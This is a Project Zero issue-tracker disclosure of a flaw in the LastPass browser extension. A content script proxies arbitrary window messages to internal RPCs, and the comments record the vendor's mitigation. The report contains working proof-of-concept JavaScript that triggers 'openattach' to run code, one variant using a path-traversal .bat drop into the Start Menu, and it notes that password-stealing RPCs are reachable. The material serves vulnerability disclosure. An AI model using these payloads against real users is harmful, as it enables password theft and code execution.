Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 11 users
Status: Fixed
Owner:
Closed: Mar 2017
Cc:



Sign in to add a comment
LastPass: websiteConnector.js content script allows proxying internal RPC commands
Project Member Reported by taviso@google.com, Mar 20 2017 Back to list
I noticed this entry in the content_script array from the LastPass manifest:

		{
			"matches": [
				"https://1min-ui-prod.service.lastpass.com/*"
			],
			"js": [
				"1minsignup/chrome/websiteConnector.js"
			],
			"all_frames": true,
			"run_at": "document_end"
		},

That's a content script that is only used for one specific lastpass.com domain, if we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
...
window.addEventListener("message", function(e) {
    e.data.fromExtension || chrome.runtime.sendMessage(e.data, function(e) {});
});

That doesn't look good, this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc). If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Windows 7-2017-03-20-16-14-27.png
104 KB View Download
Comment 1 Deleted
Project Member Comment 2 by taviso@google.com, Mar 21 2017
Ah, this version is better, it works without a prompt on Windows 10:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force lastpass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)
Comment 3 Deleted
Project Member Comment 4 by taviso@google.com, Mar 21 2017
LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling 1min-ui-prod.service.lastpass.com seems like a good enough mitigation for now.
Project Member Comment 5 by taviso@google.com, Mar 21 2017
Labels: -Restrict-View-Commit
Status: Fixed
I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

It looks like LastPass now consider this issue resolved:

https://twitter.com/LastPass/status/844176201392504834

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses. 

Additionally, if any corporate intercepting ssl proxy is returning custom error pages for NXDOMAIN then this might still be exploitable, you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note,  issue 1188  which affects LastPass on firefox is not fixed, and still works)
Sign in to add a comment